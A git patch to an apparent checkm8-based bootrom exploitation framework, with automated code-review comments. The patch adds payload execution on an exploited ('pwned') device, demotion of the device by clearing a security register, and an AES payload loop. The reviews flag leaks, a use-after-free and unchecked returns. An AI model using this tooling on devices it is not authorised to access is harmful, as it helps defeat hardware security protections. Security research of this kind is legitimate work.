From 8b25a00bd4c0b39837933883c716a891f8189f9a Mon Sep 17 00:00:00 2001 From: Gregor Haas Date: Tue, 11 Feb 2020 15:10:35 -0500 Subject: [PATCH] synchronous payloads seem to work well --- c8_remote/include/bootrom_addr.h | 1 + c8_remote/lib/payload/payload_entry.c | 3 +- c8_remote/main.c | 11 +++- c8_remote/src/exploit.c | 92 ++++++++++++++++++--------- 4 files changed, 74 insertions(+), 33 deletions(-) diff --git a/c8_remote/include/bootrom_addr.h b/c8_remote/include/bootrom_addr.h index 678e6ce..9150529 100644 --- a/c8_remote/include/bootrom_addr.h +++ b/c8_remote/include/bootrom_addr.h @@ -36,6 +36,7 @@ /* Misc */ #define ADDR_RANDOM_RET 0x10000b924 +#define ADDR_SYNC_ENTRY 0x1800afc84 #define ADDR_DFU_RETVAL (int *) 0x180088ac8 #define ADDR_DFU_STATUS (unsigned char *) 0x180088ac0 diff --git a/c8_remote/lib/payload/payload_entry.c b/c8_remote/lib/payload/payload_entry.c index 09d6e2d..20dc157 100644 --- a/c8_remote/lib/payload/payload_entry.c +++ b/c8_remote/lib/payload/payload_entry.c @@ -1,3 +1,4 @@ +#include "bootrom_addr.h" #include "dev_util.h" extern uint64_t entry_sync(uint64_t *args); @@ -10,7 +11,7 @@ uint64_t _start(uint64_t arg0, uint64_t arg1, uint64_t arg2, uint64_t arg3, uint64_t entry, args[8]; __asm__ volatile ("mov %0, x30" : "=r" (entry)); - if(entry == 0xbea /* todo: correct entry */) + if(entry == ADDR_SYNC_ENTRY /* todo: correct entry */) { args[0] = arg0; args[1] = arg1; diff --git a/c8_remote/main.c b/c8_remote/main.c index 52997f4..ad8e954 100644 --- a/c8_remote/main.c +++ b/c8_remote/main.c @@ -235,6 +235,13 @@ void aes_sw(struct pwned_device *dev) return; } + resp = execute_payload(dev, PAYLOAD_SYNC, 0, 0); + if(IS_CHECKM8_FAIL(resp->ret)) + { + printf("failed to execute sync payload\n"); + return; + } + for(i = 0; i < 100; i++) { resp = execute_payload(dev, PAYLOAD_AES_SW, 0, 7, @@ -341,9 +348,7 @@ int main() demote_device(dev); - // usb_task_exit(dev); - - floppysleep(dev); + aes_sw(dev); free_device(dev); } 
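Review bot: The `/* todo: correct entry */` comment survives verbatim next to the new `entry == ADDR_SYNC_ENTRY` comparison in payload_entry.c, so a reader cannot tell whether the constant this patch introduces in bootrom_addr.h is the confirmed value or still the placeholder the old `0xbea` was. Either drop the todo now that the magic number is gone, or reword it to say what is left to verify, e.g. `/* TODO: confirm ADDR_SYNC_ENTRY is the x30 value observed on the sync path */`. The definition of `ADDR_SYNC_ENTRY` itself carries no comment; a one-line note there that `_start` compares the link register against it would make that coupling visible to whoever next edits the address table. `_start` continues past the end of the hunk.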
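Review bot: The response from the new `execute_payload(dev, PAYLOAD_SYNC, 0, 0)` call in `aes_sw` is never released: the failure branch returns without freeing it, and on success `resp` is simply overwritten by the first `execute_payload` call inside the loop. exploit.c in this same patch pairs every response with `free_dev_cmd_resp(resp)`, so do the same here: `free_dev_cmd_resp(resp);` before the `return;` and again once the check passes, before the loop. The `return;` in the context lines just above suggests the pre-existing code has the same leak, which would be a separate cleanup. Whether `execute_payload` can return NULL is not visible here; if it can, `resp->ret` needs a guard. `aes_sw` starts and ends outside the hunk.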
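Review bot: `aes_sw(dev)` is now invoked immediately after `demote_device(dev)`, whose return value the context line above discards, even though this same patch makes `demote_device` return `CHECKM8_FAIL_XFER` or `CHECKM8_FAIL_INVARGS` on every failure path. If the AES path only makes sense on a demoted device, gate it: `if(IS_CHECKM8_FAIL(demote_device(dev))) { free_device(dev); return 1; }` with the exit value adjusted to whatever `main` already uses for its other early exits, which are not visible here. `main` begins before the hunk.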
diff --git a/c8_remote/src/exploit.c b/c8_remote/src/exploit.c index 494c5d7..cf2350d 100644 --- a/c8_remote/src/exploit.c +++ b/c8_remote/src/exploit.c @@ -294,6 +294,13 @@ int demote_device(struct pwned_device *dev) { checkm8_debug_indent("demote_device(dev = %p)\n", dev); unsigned int oldval, newval; + int retval; + + if(IS_CHECKM8_FAIL(open_device_session(dev))) + { + checkm8_debug_indent("\tfailed to open a device session\n"); + return CHECKM8_FAIL_XFER; + } struct dev_cmd_resp *resp = dev_read_memory(dev, DEMOTE_REG, 4); if(IS_CHECKM8_FAIL(resp->ret)) 
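Review bot: The session opened by the new `open_device_session(dev)` call is not visibly closed on the `dev_read_memory` failure path that starts at the hunk's last line: the body of that `if(IS_CHECKM8_FAIL(resp->ret))` lies between this hunk and the next and is not shown, and since the rest of this patch adds a `close_device_session` call to every other failure exit of `demote_device`, that branch needs one too or the session leaks on the very first error. A short comment on the open, `/* session stays open until the final close below; every early return must close it */`, would make the invariant explicit for the next edit. `demote_device` continues past the end of the hunk.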
@@ -305,46 +312,73 @@ int demote_device(struct pwned_device *dev) oldval = *((unsigned int *) resp->data); free_dev_cmd_resp(resp); - if(oldval & 1u) + if(!(oldval & 1u)) { - oldval &= 0xFFFFFFFE; + checkm8_debug_block("\tdevice already demoted\n"); + if(IS_CHECKM8_FAIL(close_device_session(dev))) + { + checkm8_debug_indent("\tfailed to close device session\n"); + return CHECKM8_FAIL_XFER; + } - checkm8_debug_indent("\tattempting to demote device\n"); - resp = dev_write_memory(dev, DEMOTE_REG, (unsigned char *) &oldval, 4); + return CHECKM8_SUCCESS; + } + + oldval &= 0xFFFFFFFE; + + checkm8_debug_indent("\tattempting to demote device\n"); + resp = dev_write_memory(dev, DEMOTE_REG, (unsigned char *) &oldval, 4); + free_dev_cmd_resp(resp); + if(IS_CHECKM8_FAIL(resp->ret)) + { + checkm8_debug_block("\tfailed to write to demotion reg\n"); + + if(IS_CHECKM8_FAIL(close_device_session(dev))) + { + checkm8_debug_indent("\tfailed to close device session\n"); + return CHECKM8_FAIL_XFER; + } + + return CHECKM8_FAIL_INVARGS; + } + + // verify + resp = dev_read_memory(dev, DEMOTE_REG, 4); + if(IS_CHECKM8_FAIL(resp->ret)) + { free_dev_cmd_resp(resp); - if(IS_CHECKM8_FAIL(resp->ret)) + checkm8_debug_block("\tfailed to verify demotion reg\n"); + + if(IS_CHECKM8_FAIL(close_device_session(dev))) { - checkm8_debug_block("\tfailed to write to demotion reg\n"); - return CHECKM8_FAIL_INVARGS; + checkm8_debug_indent("\tfailed to close device session\n"); + return CHECKM8_FAIL_XFER; } - // verify - resp = dev_read_memory(dev, DEMOTE_REG, 4); - if(IS_CHECKM8_FAIL(resp->ret)) - { - free_dev_cmd_resp(resp); - checkm8_debug_block("\tfailed to verify demotion reg\n"); - return CHECKM8_FAIL_INVARGS; - } + return CHECKM8_FAIL_INVARGS; + } - newval = *((unsigned int *) resp->data); - free_dev_cmd_resp(resp); - if(oldval == newval) - { - checkm8_debug_block("\tdemotion success!\n"); - return CHECKM8_SUCCESS; - } - else - { - checkm8_debug_block("\tdemotion register did not change!\n"); - return 
CHECKM8_FAIL_INVARGS; - } + newval = *((unsigned int *) resp->data); + free_dev_cmd_resp(resp); + + if(oldval == newval) + { + checkm8_debug_block("\tdemotion success!\n"); + retval = CHECKM8_SUCCESS; } else { - checkm8_debug_block("\tdevice already demoted\n"); - return CHECKM8_SUCCESS; + checkm8_debug_block("\tdemotion register did not change!\n"); + retval = CHECKM8_FAIL_INVARGS; } + + if(IS_CHECKM8_FAIL(close_device_session(dev))) + { + checkm8_debug_indent("\tfailed to close device session\n"); + return CHECKM8_FAIL_XFER; + } + + return retval; } void free_device(struct pwned_device *dev)
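Review bot: `resp` is read after it has been freed: on the write path the added lines `free_dev_cmd_resp(resp);` followed by `if(IS_CHECKM8_FAIL(resp->ret))` dereference released memory (the removed lines show the old code had the same ordering, and the commit re-emits it rather than fixing it). Copy the status out before releasing, assuming `ret` is an int like `retval`: `retval = resp->ret;` then `free_dev_cmd_resp(resp);` then `if(IS_CHECKM8_FAIL(retval))`. The verify branch below already does check-then-free, so only the write path is affected. Separately, the `close_device_session` plus `return CHECKM8_FAIL_XFER` block is now repeated four times; the usual C shape is a single `out:` label that closes the session and returns `retval`, with each failure path setting `retval` and jumping there. `demote_device` begins before this hunk, where `retval` is declared.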